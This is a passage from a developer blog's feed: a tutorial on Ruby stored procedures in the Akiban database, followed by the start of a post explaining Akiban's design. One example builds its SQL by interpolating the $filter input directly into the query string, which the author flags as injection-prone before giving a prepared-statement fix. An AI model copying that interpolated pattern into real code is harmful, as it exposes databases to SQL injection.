&lt;li&gt;Clojure&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That’s a pretty nice selection! I’m going to show some examples in Ruby here and if people are interested in more examples, please let me know in the comments and I’ll be sure to whip up other examples in different languages.&lt;/p&gt;

&lt;p&gt;First things first: we need to make sure Akiban is configured to allow the creation of stored procedures in Ruby. We have a pretty simple property that controls the class path for our stored procedure scripting languages, &lt;code&gt;akserver.routines.class_path&lt;/code&gt;. I just need to make sure that property holds an absolute path to where my &lt;a href='http://jruby.org/'&gt;JRuby&lt;/a&gt; jar is installed on my system. Once that property is set in my &lt;a href='http://www.akiban.com/ak-docs/admin/server/server.properties.html'&gt;server.properties&lt;/a&gt; file, I can restart Akiban and I’m ready to go.&lt;/p&gt;
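&lt;p&gt;For the record, the change itself is a one-liner. The jar path, config file location, and service name below are just assumptions for an Ubuntu package install; adjust them to wherever your JRuby jar and &lt;code&gt;server.properties&lt;/code&gt; actually live:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;# example paths only; adjust for your system&lt;/span&gt;
&lt;span class='go'&gt;echo &amp;quot;akserver.routines.class_path=/usr/lib/jruby/lib/jruby.jar&amp;quot; | sudo tee -a /etc/akiban/server.properties&lt;/span&gt;
&lt;span class='go'&gt;sudo service akiban-server restart&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;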

&lt;p&gt;Let’s start with a simple example: I just want to call a function that prints out my name.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;my_name&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;out&lt;/span&gt; &lt;span class='nb'&gt;name&lt;/span&gt; &lt;span class='no'&gt;VARCHAR&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='mi'&gt;128&lt;/span&gt;&lt;span class='p'&gt;))&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;variables&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
    &lt;span class='nb'&gt;name&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;padraig&amp;#39;&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
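&lt;p&gt;A quick aside: the &lt;code&gt;test=&amp;gt;&lt;/code&gt; prompts that follow are &lt;code&gt;psql&lt;/code&gt; sessions against Akiban. Assuming the default port, such a session is opened like so:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; psql -h localhost -p 15432 test
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;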
&lt;p&gt;Now let’s call that stored procedure from the command line:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call my_name();&lt;/span&gt;
&lt;span class='go'&gt;  name   &lt;/span&gt;
&lt;span class='go'&gt;---------&lt;/span&gt;
&lt;span class='go'&gt; padraig&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt; &lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Success! Our hello world example is up and running.&lt;/p&gt;

&lt;p&gt;We don’t just have to return simple data types like that. We can also return ruby hashes. For example, here is a stored procedure that returns a ruby hash:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;ruby_hash&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='no'&gt;IN&lt;/span&gt; &lt;span class='n'&gt;x&lt;/span&gt; &lt;span class='no'&gt;BIGINT&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='no'&gt;IN&lt;/span&gt; &lt;span class='n'&gt;y&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='no'&gt;OUT&lt;/span&gt; &lt;span class='n'&gt;s&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='no'&gt;OUT&lt;/span&gt; &lt;span class='nb'&gt;p&lt;/span&gt;
&lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;variables&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
&lt;span class='p'&gt;{&lt;/span&gt; &lt;span class='s2'&gt;&amp;quot;p&amp;quot;&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='vg'&gt;$x&lt;/span&gt; &lt;span class='o'&gt;*&lt;/span&gt; &lt;span class='vg'&gt;$y&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;
  &lt;span class='s2'&gt;&amp;quot;s&amp;quot;&lt;/span&gt; &lt;span class='o'&gt;=&amp;gt;&lt;/span&gt; &lt;span class='vg'&gt;$x&lt;/span&gt; &lt;span class='o'&gt;+&lt;/span&gt; &lt;span class='vg'&gt;$y&lt;/span&gt; &lt;span class='p'&gt;}&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Notice this example also demonstrates how to pass parameters to a stored procedure. Running the above stored procedure, we get:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call ruby_hash(10, 100);&lt;/span&gt;
&lt;span class='go'&gt;   s   |   p    &lt;/span&gt;
&lt;span class='go'&gt;-------+--------&lt;/span&gt;
&lt;span class='go'&gt; 110.0 | 1000.0&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A common example used when demonstrating a programming language is a function to compute &lt;a href='http://en.wikipedia.org/wiki/Fibonacci_number'&gt;Fibonacci numbers&lt;/a&gt;. Hence, here is a stored procedure to do just that:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;fib_r&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='no'&gt;IN&lt;/span&gt; &lt;span class='n'&gt;x&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='no'&gt;OUT&lt;/span&gt; &lt;span class='n'&gt;s&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;java&lt;/span&gt; &lt;span class='no'&gt;EXTERNAL&lt;/span&gt; &lt;span class='no'&gt;NAME&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;do_fib&amp;#39;&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
    &lt;span class='k'&gt;def&lt;/span&gt; &lt;span class='nf'&gt;do_fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;x&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='n'&gt;s&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
      &lt;span class='n'&gt;s&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='k'&gt;end&lt;/span&gt;
    &lt;span class='k'&gt;def&lt;/span&gt; &lt;span class='nf'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;n&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
      &lt;span class='n'&gt;n&lt;/span&gt; &lt;span class='o'&gt;&amp;lt;&lt;/span&gt; &lt;span class='mi'&gt;2&lt;/span&gt; &lt;span class='o'&gt;?&lt;/span&gt; &lt;span class='n'&gt;n&lt;/span&gt; &lt;span class='p'&gt;:&lt;/span&gt; &lt;span class='n'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;n&lt;/span&gt; &lt;span class='o'&gt;-&lt;/span&gt; &lt;span class='mi'&gt;1&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='o'&gt;+&lt;/span&gt; &lt;span class='n'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;n&lt;/span&gt; &lt;span class='o'&gt;-&lt;/span&gt; &lt;span class='mi'&gt;2&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='k'&gt;end&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the code above, note that &lt;code&gt;PARAMETER STYLE java&lt;/code&gt; means that the function named with &lt;code&gt;EXTERNAL NAME&lt;/code&gt; takes as many positional arguments as there are parameters. And an example of running it:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call fib_r(10);&lt;/span&gt;
&lt;span class='go'&gt;  s   &lt;/span&gt;
&lt;span class='go'&gt;------&lt;/span&gt;
&lt;span class='go'&gt; 55.0&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A common technique used to speed up this implementation is memoization. A stored procedure that uses this technique follows:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;fib_non_r&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='no'&gt;IN&lt;/span&gt; &lt;span class='n'&gt;x&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='no'&gt;OUT&lt;/span&gt; &lt;span class='n'&gt;s&lt;/span&gt; &lt;span class='no'&gt;DOUBLE&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;java&lt;/span&gt; &lt;span class='no'&gt;EXTERNAL&lt;/span&gt; &lt;span class='no'&gt;NAME&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;do_fib&amp;#39;&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
    &lt;span class='k'&gt;def&lt;/span&gt; &lt;span class='nf'&gt;do_fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;x&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; &lt;span class='n'&gt;s&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
      &lt;span class='n'&gt;s&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='mi'&gt;0&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;x&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='k'&gt;end&lt;/span&gt;
    &lt;span class='vg'&gt;$fibonacci&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='no'&gt;Hash&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;new&lt;/span&gt;&lt;span class='p'&gt;{&lt;/span&gt; &lt;span class='o'&gt;|&lt;/span&gt;&lt;span class='n'&gt;h&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt;&lt;span class='n'&gt;k&lt;/span&gt;&lt;span class='o'&gt;|&lt;/span&gt; &lt;span class='n'&gt;h&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='n'&gt;k&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;k&lt;/span&gt; &lt;span class='o'&gt;&amp;lt;&lt;/span&gt; &lt;span class='mi'&gt;2&lt;/span&gt; &lt;span class='o'&gt;?&lt;/span&gt; &lt;span class='n'&gt;k&lt;/span&gt; &lt;span class='p'&gt;:&lt;/span&gt; &lt;span class='n'&gt;h&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='n'&gt;k&lt;/span&gt;&lt;span class='o'&gt;-&lt;/span&gt;&lt;span class='mi'&gt;1&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='o'&gt;+&lt;/span&gt; &lt;span class='n'&gt;h&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='n'&gt;k&lt;/span&gt;&lt;span class='o'&gt;-&lt;/span&gt;&lt;span class='mi'&gt;2&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt; &lt;span class='p'&gt;}&lt;/span&gt;
    &lt;span class='k'&gt;def&lt;/span&gt; &lt;span class='nf'&gt;fib&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;n&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
      &lt;span class='vg'&gt;$fibonacci&lt;/span&gt;&lt;span class='o'&gt;[&lt;/span&gt;&lt;span class='n'&gt;n&lt;/span&gt;&lt;span class='o'&gt;]&lt;/span&gt;
    &lt;span class='k'&gt;end&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let’s turn on some timing and compare the recursive version with the version that uses memoization.&lt;/p&gt;
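&lt;p&gt;The per-statement timings below come from &lt;code&gt;psql&lt;/code&gt;’s built-in timer, which is toggled with the &lt;code&gt;\timing&lt;/code&gt; meta-command:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; \timing&lt;/span&gt;
&lt;span class='go'&gt;Timing is on.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;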
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call fib_r(30);&lt;/span&gt;
&lt;span class='go'&gt;    s     &lt;/span&gt;
&lt;span class='go'&gt;----------&lt;/span&gt;
&lt;span class='go'&gt; 832040.0&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;Time: 469.492 ms&lt;/span&gt;
&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt; call fib_non_r(30);&lt;/span&gt;
&lt;span class='go'&gt;    s     &lt;/span&gt;
&lt;span class='go'&gt;----------&lt;/span&gt;
&lt;span class='go'&gt; 832040.0&lt;/span&gt;
&lt;span class='go'&gt;(1 row)&lt;/span&gt;

&lt;span class='go'&gt;Time: 4.649 ms&lt;/span&gt;
&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As expected, the version that uses memoization is much faster. Next I’m going to write a stored procedure that returns some data from a query. Let’s say I create a simple table and insert some data into it like so:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; create table t1(id int);&lt;/span&gt;
&lt;span class='go'&gt;CREATE TABLE&lt;/span&gt;
&lt;span class='go'&gt;test=&amp;gt; insert into t1 values (1), (2), (3), (4), (5), (6);&lt;/span&gt;
&lt;span class='go'&gt;INSERT 0 6&lt;/span&gt;
&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This stored procedure will return all the data from that table and order it by ID. A simple procedure to do that is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;get_data&lt;/span&gt;&lt;span class='p'&gt;()&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;variables&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
    &lt;span class='n'&gt;conn&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt;
&lt;span class='n'&gt;java&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;sql&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;DriverManager&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;get_connection&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;jdbc:default:connection&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='n'&gt;conn&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;create_statement&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;execute_query&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;SELECT id FROM t1 ORDER BY id&lt;/span&gt;
&lt;span class='s2'&gt;DESC&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And let’s call the stored procedure and see what kind of results we get:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call get_data();&lt;/span&gt;
&lt;span class='go'&gt; id &lt;/span&gt;
&lt;span class='go'&gt;----&lt;/span&gt;
&lt;span class='go'&gt;  6&lt;/span&gt;
&lt;span class='go'&gt;  5&lt;/span&gt;
&lt;span class='go'&gt;  4&lt;/span&gt;
&lt;span class='go'&gt;  3&lt;/span&gt;
&lt;span class='go'&gt;  2&lt;/span&gt;
&lt;span class='go'&gt;  1&lt;/span&gt;
&lt;span class='go'&gt;(6 rows)&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As a final example, I want to extend this procedure with an input parameter that filters the query results to only those ID values greater than the input value.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;&lt;span class='no'&gt;CREATE&lt;/span&gt; &lt;span class='no'&gt;PROCEDURE&lt;/span&gt; &lt;span class='n'&gt;get_data&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='no'&gt;IN&lt;/span&gt; &lt;span class='n'&gt;filter&lt;/span&gt; &lt;span class='no'&gt;BIGINT&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
  &lt;span class='no'&gt;LANGUAGE&lt;/span&gt; &lt;span class='n'&gt;ruby&lt;/span&gt; &lt;span class='no'&gt;PARAMETER&lt;/span&gt; &lt;span class='no'&gt;STYLE&lt;/span&gt; &lt;span class='n'&gt;variables&lt;/span&gt; &lt;span class='no'&gt;AS&lt;/span&gt; &lt;span class='vg'&gt;$$&lt;/span&gt;
    &lt;span class='n'&gt;conn&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt;
&lt;span class='n'&gt;java&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;sql&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;DriverManager&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;get_connection&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;jdbc:default:connection&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
    &lt;span class='n'&gt;conn&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;create_statement&lt;/span&gt;&lt;span class='o'&gt;.&lt;/span&gt;&lt;span class='n'&gt;execute_query&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;SELECT id FROM t1 WHERE id &amp;gt;&lt;/span&gt;
&lt;span class='si'&gt;#{&lt;/span&gt;&lt;span class='vg'&gt;$filter&lt;/span&gt;&lt;span class='si'&gt;}&lt;/span&gt;&lt;span class='s2'&gt; ORDER BY id DESC&amp;quot;&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;
&lt;span class='vg'&gt;$$&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running the above procedure with a valid input value yields:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;test=&amp;gt; call get_data(2);&lt;/span&gt;
&lt;span class='go'&gt; id &lt;/span&gt;
&lt;span class='go'&gt;----&lt;/span&gt;
&lt;span class='go'&gt;  6&lt;/span&gt;
&lt;span class='go'&gt;  5&lt;/span&gt;
&lt;span class='go'&gt;  4&lt;/span&gt;
&lt;span class='go'&gt;  3&lt;/span&gt;
&lt;span class='go'&gt;(4 rows)&lt;/span&gt;

&lt;span class='go'&gt;test=&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
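&lt;p&gt;One caveat worth noting: the procedure above interpolates &lt;code&gt;$filter&lt;/code&gt; directly into the SQL string, which is fine for a demo but invites SQL injection in real code. Since these procedures are just JRuby over JDBC, a prepared statement should work as well. Here is a minimal sketch of the body, assuming the same JRuby snake_case method conventions used above (I have not benchmarked this variant):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='ruby'&gt;# open the in-process JDBC connection, as in the examples above
conn = java.sql.DriverManager.get_connection("jdbc:default:connection")
# bind the input value instead of interpolating it into the SQL text
stmt = conn.prepare_statement("SELECT id FROM t1 WHERE id &amp;gt; ? ORDER BY id DESC")
stmt.set_long(1, $filter)
stmt.execute_query
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;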
&lt;p&gt;The above were some simple examples of writing stored procedures in Ruby with Akiban. I’ll likely write another post with some more advanced examples when I get a chance. If this interests you, definitely download the &lt;a href='http://akiban.com/downloads'&gt;1.4.3 release&lt;/a&gt; and play around with it to try this out for yourself. If anybody has questions or would like more examples and information, please ask in the comments or on our &lt;a href='https://groups.google.com/a/akiban.com/d/forum/akiban-user'&gt;public mailing list&lt;/a&gt; and I’ll be happy to answer.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Why Build a New SQL Database?</title>
   <link href="http://posulliv.github.com/2012/11/12/why-akiban"/>
   <updated>2012-11-12T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2012/11/12/why-akiban</id>
   <content type="html">&lt;p&gt;When I’m at conferences or meetups and people discover I work for a company building a new database, there are usually a few puzzled looks. Explaining the technology behind Akiban to people is easy but the usual reason for the puzzlement is that many people wonder why on earth a company would want to develop a new database from scratch when so many alternatives already exist.&lt;/p&gt;

&lt;p&gt;There are good reasons, but I’ve struggled with articulating them especially when someone wants a 90 second explanation at a conference. In the interest of having an answer that I can easily refer people to, here’s what I think we’re trying to do. These are the problems that Akiban is aiming to solve.&lt;/p&gt;

&lt;h1 id='problems_akiban_solves'&gt;Problems Akiban Solves&lt;/h1&gt;

&lt;p&gt;&lt;em&gt;1) The object-relational impedance mismatch&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Frequently referred to by some as the “Vietnam of computer science”, this problem is defined by Wikipedia as:&lt;/p&gt;

&lt;p&gt;“a set of conceptual and technical difficulties that are often encountered when a relational database is being used by a program written in an object-oriented programming language or style”&lt;/p&gt;

&lt;p&gt;Typically, each class in an application is mapped to a table in the backend database, with the fields of that class becoming columns of the table and each instance of that class stored as a row in the corresponding table. In Akiban, application objects map to what we call table groups. Table groups are fundamentally a way of storing data: we store data as interleaved rows in a B+ tree. Or more simply put, Akiban stores data hierarchically.&lt;/p&gt;
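&lt;p&gt;To make that concrete, here is a rough sketch of how a table group is declared; the schema is my own illustration and the exact DDL details may differ slightly, so treat it as approximate rather than authoritative:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;CREATE TABLE customers (
  cid  INT NOT NULL PRIMARY KEY,
  name VARCHAR(64)
);

-- the GROUPING FOREIGN KEY nests orders under customers,
-- so both tables are stored interleaved in one table group
CREATE TABLE orders (
  oid        INT NOT NULL PRIMARY KEY,
  cid        INT NOT NULL,
  order_date DATE,
  GROUPING FOREIGN KEY (cid) REFERENCES customers (cid)
);
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;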

&lt;p&gt;This makes integration of Akiban with existing ORMs an interesting proposition since we expose methods of retrieving table groups directly through SQL. For example, Mike Bayer recently implemented support for Akiban in the SQLAlchemy &lt;a href='http://techspot.zzzeek.org/2012/10/25/supporting-a-very-interesting-new-database/'&gt;ORM for Python&lt;/a&gt;. We are also working on support for Doctrine in the PHP world and &lt;a href='http://github.com/akiban/activerecord-akiban-adapter'&gt;ActiveRecord&lt;/a&gt; in the Ruby world.&lt;/p&gt;

&lt;p&gt;Dr. Eric Brewer also touched on this in his &lt;a href='http://vimeo.com/52446728'&gt;closing talk&lt;/a&gt; at &lt;a href='http://basho.com/community/ricon2012/'&gt;RICON 2012&lt;/a&gt; (which seems to have been an excellent conference based on the posted videos). One quote from Dr. Brewer that really stuck out in my mind was - “instead of clean database where tables are joined at last minute. I actually want to have pre-joined them. I don&amp;#8217;t really want to do more than 1 query”. That ties in nicely with what we allow by exposing methods to retrieve table groups, or parts of them, with nested SQL: an entire table group or part of one can be retrieved in a single query.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;2) SQL (performance) doesn’t have to suck&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;SQL gets a bad rap. I’m not 100% sure if that’s because people don’t like the language or because poor experiences have convinced people that the performance of SQL queries is terrible. Perhaps it’s a little bit of both. What’s great about SQL is that so-called ‘neck-tie’ programmers can easily use this declarative language to interact with a database system. To quote again from Dr. Brewer’s &lt;a href='http://basho.com/community/ricon2012/'&gt;RICON&lt;/a&gt; talk - “having a language for them is a good idea. nosql does not really talk to these people”.&lt;/p&gt;

&lt;p&gt;SQL can be used to solve many problem types. I once heard someone quip, “there’s a SQL query for that”, meaning there are likely few problems out there that SQL cannot solve.&lt;/p&gt;

